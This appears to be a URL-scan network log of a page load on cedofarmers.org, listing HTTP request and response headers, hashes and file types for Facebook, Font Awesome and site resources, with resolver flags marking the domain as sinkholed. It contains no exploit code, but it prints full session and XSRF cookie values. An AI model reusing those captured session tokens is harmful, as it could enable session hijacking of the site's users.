Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 05:50:55 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: DqoZelwBEBHhSJ9BGwQiSQ==
x-fb-debug: yMzCe1sdU6mg7klvggXuZjDYvUcaDAkJnsXnHCkzBQ/uvXgKylMoqhhpMHmyOsGd3IWLNB0nsY5GHPnHulUPqg==
content-length: 8222
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 338 B URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (327)
Hash 76f593e842677f73cd0a06232874b2c3
25a13f79478d5a0e286a2299dca2f3b296463079
74dcbe026002f10b703960a500b50dabe518862e568a9e689dec7afa243fa44d
GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 27 Oct 2023 20:08:04 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: dvWT6EJnf3PNCgYjKHSyww==
x-fb-debug: C8ru5zkRydgvHeANSR5CCnJiMJOKT/Cn1D/peSgWNQK5UFwPIyoKe+MHTJeZ5YMaL9iMR1r/NPoYeX9Euxr11g==
priority: u=3,i
content-length: 338
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 4.6 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type C source, ASCII text, with very long lines (10494)
Hash 2eb625206434356a5678c51841c11964
4ecd1c720cc21d03d6c5d68a3cfbe7636cccf23d
feab180e6aa77381b51329ed9391e05765ab1a7831691215010cce091f635781
GET /rsrc.php/v3/yW/r/SigIl-WfFaj.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 04 Nov 2023 06:52:20 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: LrYlIGQ0NWpWeMUYQcEZZA==
x-fb-debug: 7iGu7w468misanBoQha65sd9JUn7Fdp1ArgzwyEA/WmqsxntGFQ0+OsG24rQ7mU8zZ6R4kxfDbeNvU3kL2Ov+w==
priority: u=3,i
content-length: 4647
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 7.1 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (2905)
Hash 950c261533c6a05f36c3ec2562963ecb
65cbaffa72eb8dafe5b43aec833435170c02b15d
4c9b051d6cba504010fc8ebdba2ca7da807224e44ad7e9798bb25b90069a3e11
GET /rsrc.php/v3iLl54/yH/l/en_US/9ceEMw7kTfT.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 03 Nov 2023 14:14:05 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: lQwmFTPGoF82w+wlYpY+yw==
x-fb-debug: phadaMIRZ6ov3mzgq5gAEP4IlauDDLQqfKhKpxXgcADdE1JWQfgvH0G70mLEeZDNLSQH85Trej64mPL242l0SQ==
content-length: 7089
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 7.2 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4061)
Hash d1ba68f146b01f4aef60d79aadb926ea
c6b4703c25d07fd2363e5d67d11e4846d9979b26
abbff04acf96f39a3121ed97505b5a23cbeee9057dd7040c58c4e423c899805d
GET /rsrc.php/v3/yV/r/oDVETVg4GJv.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 02 Nov 2023 18:54:51 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 0bpo8UawH0rvYNearbkm6g==
x-fb-debug: nETVm4WUsTBjWzPPz30+NcQ/dUZibWclH+7BC3skx38X1frzgZPa413yNFDo1GF9yx7utvfMwnrRvZAKq6brWw==
content-length: 7236
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 5.0 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (4431)
Hash 68b687b4bd9b8bc82a675dcc86c76b59
4e9194a9831c6c1b400ebe65e6be09661f0997cd
f7acf02cb9f1350a252391e55a8e577ea291aa212f3577aa15c8f0d963a12e5f
GET /rsrc.php/v3/yF/l/0,cross/ScKYGqqHLxM.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: text/css; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 18:03:24 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: aLaHtL2bi8gqZ13MhsdrWQ==
x-fb-debug: U2NYlGCDC8vM6+H94gXuaKpd2vCIvO+cBEZrmO/ZCY/220x4aySHC0Vjdw8uuAPICOmRg5+Qwt5jx++CX+JF9Q==
priority: u=2
content-length: 5031
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 23 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (41977)
Hash e5ac274375457b828912871811b4be94
3bbd528facf279eab4dc093a7fad9dbc837689eb
602f6ee48130b3bcb4e21f4307bd1c83d110182e1fb4cb8f118171d10c6f5ae4
GET /rsrc.php/v3iEpO4/yC/l/en_US/I52F_owkvX4.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 02 Nov 2023 19:19:47 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 5awnQ3VFe4KJEocYEbS+lA==
x-fb-debug: A69DPQXhkxcqr8dhq9gxsPnfUKmSBxAmHB1DiK5n9OBFY9YKN4sHzuSG6TTw/KAmtV3VGX6Zl/E3RELd2smEhA==
priority: u=3,i
content-length: 23273
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
use.fontawesome.com/releases/v5.7.2/css/all.css
172.64.132.15200 OK 13 kB URL HTTP/2 use.fontawesome.com/releases/v5.7.2/css/all.css
IP 172.64.132.15:0
File type ASCII text, with very long lines (54456), with no line terminators
Hash 6c8334c229d6a393c38e6ea8255c6c98
da953b4f3934df475213713e1f0dc3c917221196
11335baaef33c3a7446ff14ad2988649a5bac0e683c72a8065e7a906b2313fb0
GET /releases/v5.7.2/css/all.css HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://cedofarmers.org
Connection: keep-alive
Referer: https://cedofarmers.org/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:36 GMT
content-type: text/css
x-amz-id-2: +rhLG+MOji4KHBZGRWrcg+5HfaomEQuxrRIyp7ctCPNSbM8zFBD8gAYD19HxrhkIPoWcq7L3C4o=
x-amz-request-id: 5Z7GP9CE0MGX9XSJ
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:45:57 GMT
etag: W/"7b1d7f457d056ace7b230b587b9f3753"
cache-control: max-age=31556926
cf-cache-status: MISS
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QLp0W9H4HEoyBf2gCzsjy9T%2BYhAQDF8%2BpI%2FFKnlD3Ci40DL0zEfSPCzbW1h0%2FNdSjDi%2BNBlvAfousj7HVy%2FArQatSeqRr5uelpYgk%2Fff%2BYGaC2jmBAl%2FRH3Q3p8QLGC5VJAzWhsh"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7671b26a09c475c6-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/css/style.css
192.185.57.117200 OK 54 kB URL HTTP/2 cedofarmers.org/css/style.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 63e5a027a430bc24a0d17d6040d63431
a58bd20f076b20fb05f6b42bd18275b9bf2ea47d
55d724ee05f250765c8970ab4292103656dd79903632cb444926c7b133eddfc6
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/style.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 19 Jun 2021 15:50:27 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 91 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (18630)
Hash 2735f6f13ab0e68d5d21650e8d76d90d
fac3c804bd2c335c0c6aa615a0f6bd9197d5ed87
1744afaa9fc41238e9cfa2073844a8c1ed9c80093e5f1555fc93acfbec268b5d
GET /rsrc.php/v3/yM/r/WNuD0ewp6xQ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 01:32:04 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: JzX28Tqw5o1dIWUOjXbZDQ==
x-fb-debug: bC5+aa5Je0InC3pf1rVrCdTR4TP6lFHLdvrsN0ce1Cc3jv3cHGvzYTQToVx8+qOeVfHGmJ0JfNlleTuHo1Q+uQ==
content-length: 91137
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 16 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type C source, ASCII text, with very long lines (8749)
Hash c2b0fc32b893b1c243b3a27bcc5799cd
a9a85686e79bf7bba56cf1a7883b89447096eb54
f84f8dc2511cfbed3abe4ae7dd9c8e02c02260e0824eddaf69f2d54f3994a726
GET /rsrc.php/v3/ys/r/ojzICpVg5Kb.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 05 Nov 2023 03:23:46 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: wrD8MriTscJDs6J7zFeZzQ==
x-fb-debug: ZeaG4nczRFV9qJrZM59ZmYklxtldDRvk75b6fH34gkz1gMCEFsaTtetQwAT3aF82JRPYbxFDD5vVyCK2+3MHGg==
priority: u=3,i
content-length: 16259
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
31.13.72.12200 OK 12 kB URL HTTP/2 static.xx.fbcdn.net/rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz
IP 31.13.72.12:0
File type ASCII text, with very long lines (5542)
Hash 0765d76d746716156d53d36ee6f80836
17e1546f87cc6417615caa10dcbbcb699c59471a
f1e6af63ae9ff0385126b72a492b0d34709514dd4c00074a1be28272c253d4f8
GET /rsrc.php/v3/y6/r/8LoDHCcRMmF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Host: static.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 08 Nov 2023 14:58:40 GMT
cache-control: public,max-age=31536000,immutable
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: B2XXbXRnFhVtU9Nu5vgINg==
x-fb-debug: D5GS3x6wx04rycniYZY/0Xz+ksXYSSm92jqaYBfwJdNE2gVWZsHNSKS1Na1e4Jf9SQ8Wn6qjKZVunFivJgncuw==
priority: u=3,i
content-length: 12369
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:38 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
scontent-arn2-2.xx.fbcdn.net/v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E
157.240.194.27200 OK 2.2 kB URL HTTP/2 scontent-arn2-2.xx.fbcdn.net/v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E
IP 157.240.194.27:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x50, components 3\012- data
Hash 2dc2b52940d4885637e6e4097f6cfb94
f9f70a65aab76ad9ff18216f6c05563f63775a88
5c5b484596b6266c93c3540e573c174561a16c6cc61985ed3750ffeb2c82d185
GET /v/t39.30808-1/308009677_406387218318479_7887056903145320551_n.jpg?stp=c1.0.50.50a_cp0_dst-jpg_p50x50&_nc_cat=108&ccb=1-7&_nc_sid=dbb9e7&_nc_ohc=AF4olkElq2UAX-cgmYK&_nc_ht=scontent-arn2-2.xx&oh=00_AfAba7cdRPHinAdz5eXe6Aaam63J3uuPZV6KGeRPycboFg&oe=6370217E HTTP/1.1
Host: scontent-arn2-2.xx.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.facebook.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-storage-error-category: dfs:none;hs_p:200:HS_ESUCCESS
last-modified: Wed, 28 Sep 2022 02:14:43 GMT
x-haystack-needlechecksum: 2226211856
x-needle-checksum: 185997496
content-type: image/jpeg
content-digest: adler32=2948273709
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
cache-control: max-age=1209600, no-transform
content-length: 2152
x-fb-trip-id: 1904183273
date: Tue, 08 Nov 2022 22:20:39 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226138-LWR_logo.png
192.185.57.117200 OK 6.5 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226138-LWR_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 202 x 105, 8-bit/color RGBA, non-interlaced\012- data
Hash 8e5beb848c845557339a3655c5739797
9f3e281eb8228e6b9e7e394ecf9c41d59de7f5fa
e22a121b4142e6b94b58f79e8e470c1b0a68f96e0df9ead4800c5f9c44cb4e9b
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226138-LWR_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:18 GMT
accept-ranges: bytes
content-length: 6465
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226130-KARLO_logo.jpg
192.185.57.117200 OK 8.0 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226130-KARLO_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 150x107, components 3\012- data
Hash a70178ed43b38e68755a5d8151784977
82efa0ffc4c68bd719647ae2280f558fcaf8d3fc
49c0797da907ea1e62d3f25df9546275a097ebf1618f63b22b9b9e9e5571ce7c
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226130-KARLO_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
